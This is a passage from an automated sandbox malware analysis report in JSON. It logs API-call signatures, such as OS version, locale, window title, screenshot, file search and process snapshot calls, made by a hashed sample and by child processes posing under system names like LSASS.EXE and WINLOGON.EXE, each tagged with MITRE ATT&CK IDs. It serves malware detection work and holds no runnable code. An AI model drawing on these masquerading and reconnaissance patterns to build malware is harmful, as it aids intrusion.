1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000c8ff240068da1200b3446f6c81d0607600000000000000000000000000000000000000000000000018010000000000000000000000000000b5c759ce66c776c824df12005ecb5e761801000000000000005d5c7680e112000e5d5c7618dd1200dcaa6076010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600ecc459cef8da12006d828c77d481260004010000 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d779823660000b0fd7f9a5c7c7700f0fd7f60c6120044b0fd7f00000000400000003f0000002000000000b0fd7f54c61200c15c7c77608283772000000000b0fd7f9a5c7c7700f0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00006008)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b4701d01b47010016470100004401e4144701880000008800000017687b7798174701ff2b7b772069bd77a41b4701ac0122000000220000004401c06d44011000ac00fb040000c06d44015016470110000000000000001100a700fb040000c06d4401 (UID: 00000000-00005948)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d77e02d27000070fd7f9a5c7c7700f0fd7f60c612004470fd7f00000000400000003f000000200000000070fd7f54c61200c15c7c7760828377200000000070fd7f9a5c7c7700f0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d7760e2270000f0fd7f9a5c7c7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c7c77608283772000000000f0fd7f9a5c7c7700e0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00002452)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a00100005a1b6c00581b6c0088156c00000069006c146c00880000008800000017687b7720176c00ff2b7b77105ebd772c1b6c00ac011b0000001b0000006900905b69001000ac0014010000905b6900d8156c0010000000000000001100a70014010000905b6900 (UID: 00000000-00004240)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d7720ae1c000060fd7f9a5c7c7700f0fd7f60c612004460fd7f00000000400000003f000000200000000060fd7f54c61200c15c7c7760828377200000000060fd7f9a5c7c7700f0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00003996)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a00100005a1bf601581bf6018815f6010000f3016c14f601880000008800000017687b772017f601ff2b7b77224abd772c1bf601ac016200000062000000f301905bf3011000ac0090050000905bf301d815f60110000000000000001100a70090050000905bf301 (UID: 00000000-00002952)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b5901d01b59010016590100005601e4145901880000008800000017687b7798175901ff2b7b77e24fbd77a41b5901ac0161000000610000005601c06d5601140098001b000000c06d5601501659011000000000000000150093001b000000c06d5601 (UID: 00000000-00004068)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21be001d01be0010016e0010000dd01e414e001880000008800000017687b779817e001ff2b7b778844bd77a41be001ac016100000061000000dd01c06ddd011200a200fb040000c06ddd015016e001100000000000000013009d00fb040000c06ddd01 (UID: 00000000-00004372)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b4d01d01b4d0100164d0100004a01e4144d01880000008800000017687b7798174d01ff2b7b77c644bd77a41b4d01ac0160000000600000004a01c06d4a011200a2003c040000c06d4a0150164d01100000000000000013009d003c040000c06d4a01 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d7780b064000070fd7f9a5c7c7700f0fd7f60c612004470fd7f00000000400000003f000000200000000070fd7f54c61200c15c7c7760828377200000000070fd7f9a5c7c7700f0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b6400d01b64000016640000006100e4146400880000008800000017687b7798176400ff2b7b77f844bd77a41b6400ac011e0000001e0000006100c06d61001200a2007c030000c06d610050166400100000000000000013009d007c030000c06d6100 (UID: 00000000-00004364)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a00100005a1bc801581bc8018815c8010000c5016c14c801880000008800000017687b772017c801ff2b7b779133bd772c1bc801ac012d0000002d000000c501905bc5011000ac0090050000905bc501d815c80110000000000000001100a70090050000905bc501 (UID: 00000000-00002444)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21bdc01d01bdc010016dc010000d901e414dc01880000008800000017687b779817dc01ff2b7b77df33bd77a41bdc01ac012b0000002b000000d901c06dd901140098001f000000c06dd9015016dc011000000000000000150093001f000000c06dd901 (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d7770b22f0000a0fd7f9a5c7c7700f0fd7f60c6120044a0fd7f00000000400000003f0000001f00000000a0fd7f54c61200c15c7c77608283771f00000000a0fd7f9a5c7c7700f0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00000272)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b5301d01b53010016530100005001e4145301880000008800000017687b7798175301ff2b7b77e428bd77a41b5301ac011a0000001a0000005001c06d50011200a20090050000c06d500150165301100000000000000013009d0090050000c06d5001 (UID: 00000000-00005880)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3d7728a41a0000c0fd7f9a5c7c7700f0fd7f60c6120044c0fd7f00000000400000003f0000001f00000000c0fd7f54c61200c15c7c77608283771f00000000c0fd7f9a5c7c7700f0fd7f78c6120057897b778083837713177d75d8eb3d77 (UID: 00000000-00003964)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a00100005a1bd701581bd7018815d7010000d4016c14d701880000008800000017687b772017d701ff2b7b772a27bd772c1bd701ac012e0000002e000000d401905bd4011000ac003e040000905bd401d815d70110000000000000001100a7003e040000905bd401 (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b4701d01b47010016470100004401e4144701880000008800000017687b7798174701ff2b7b775e1bbd77a41b4701ac0126000000260000004401c06d4401140098006f010000c06d4401501647011000000000000000150093006f010000c06d4401 (UID: 00000000-00002304)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21bec01d01bec010016ec010000e901e414ec01880000008800000017687b779817ec01ff2b7b776e1bbd77a41bec01ac012200000022000000e901c06de90113009d0021020000c06de9015016ec0110000000000000001400980021020000c06de901 (UID: 00000000-00003728)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b4701d01b47010016470100004401e4144701880000008800000017687b7798174701ff2b7b77991fbd77a41b4701ac0126000000260000004401c06d44011200a200fb040000c06d440150164701100000000000000013009d00fb040000c06d4401 (UID: 00000000-00002344)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21bc001d01bc0010016c0010000bd01e414c001880000008800000017687b779817c001ff2b7b771716bd77a41bc001ac012d0000002d000000bd01c06dbd011200a200fb040000c06dbd015016c001100000000000000013009d00fb040000c06dbd01 (UID: 00000000-00004336)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21bb801d01bb8010016b8010000b501e414b801880000008800000017687b779817b801ff2b7b774f17bd77a41bb801ac011f0000001f000000b501c06db5011200a200fd040000c06db5015016b801100000000000000013009d00fd040000c06db501 (UID: 00000000-00004348)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a00100005a1bca01581bca018815ca010000c7016c14ca01880000008800000017687b772017ca01ff2b7b770f0dbd772c1bca01ac011600000016000000c701905bc7011000ac0090050000905bc701d815ca0110000000000000001100a70090050000905bc701 (UID: 00000000-00000916)\n \"SMSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750597b7798010000a0010000d21b3601d01b36010016360100003301e4143601880000008800000017687b7798173601ff2b7b771f0dbd77a41b3601ac011d0000001d0000003301c06d33011200a200fb040000c06d330150163601100000000000000013009d00fb040000c06d3301 (UID: 00000000-00000952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005948)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004240)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002952)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004068)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004372)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004364)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002444)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00000272)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005880)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002304)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002344)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006008)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"GetWindowTextA\" (UID: 00000000-00006008)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"GetWindowTextA\" (UID: 00000000-00002452)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"IsWow64Process\" with parameter \"6008\" - (UID: 00000000-00006008)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5948\" - (UID: 00000000-00005948)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"2452\" - (UID: 00000000-00002452)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"3996\" - (UID: 00000000-00003996)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"1176\" - (UID: 00000000-00001176)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"272\" - (UID: 00000000-00000272)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"3964\" - (UID: 00000000-00003964)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"952\" - (UID: 00000000-00000952)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005948)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004240)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002952)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004068)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004372)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004364)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002444)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000272)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005880)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002304)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003728)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002344)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004336)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004348)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000916)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003376)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001864)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004268)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006096)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000572)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003328)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003448)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010ac7\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"5b010921\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"5b010921\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"5b010921\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Cursors (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter debug (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter diagnostics (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter DigitalLocker (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Downloaded Program Files (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter ehome (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter en-US (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter explorer.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Fonts (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter fveupdate.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Globalization (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"FindNextFileW\" with parameter Help (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"504\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"608\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"684\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"772\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"828\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"872\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"896\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1120\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1268\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters 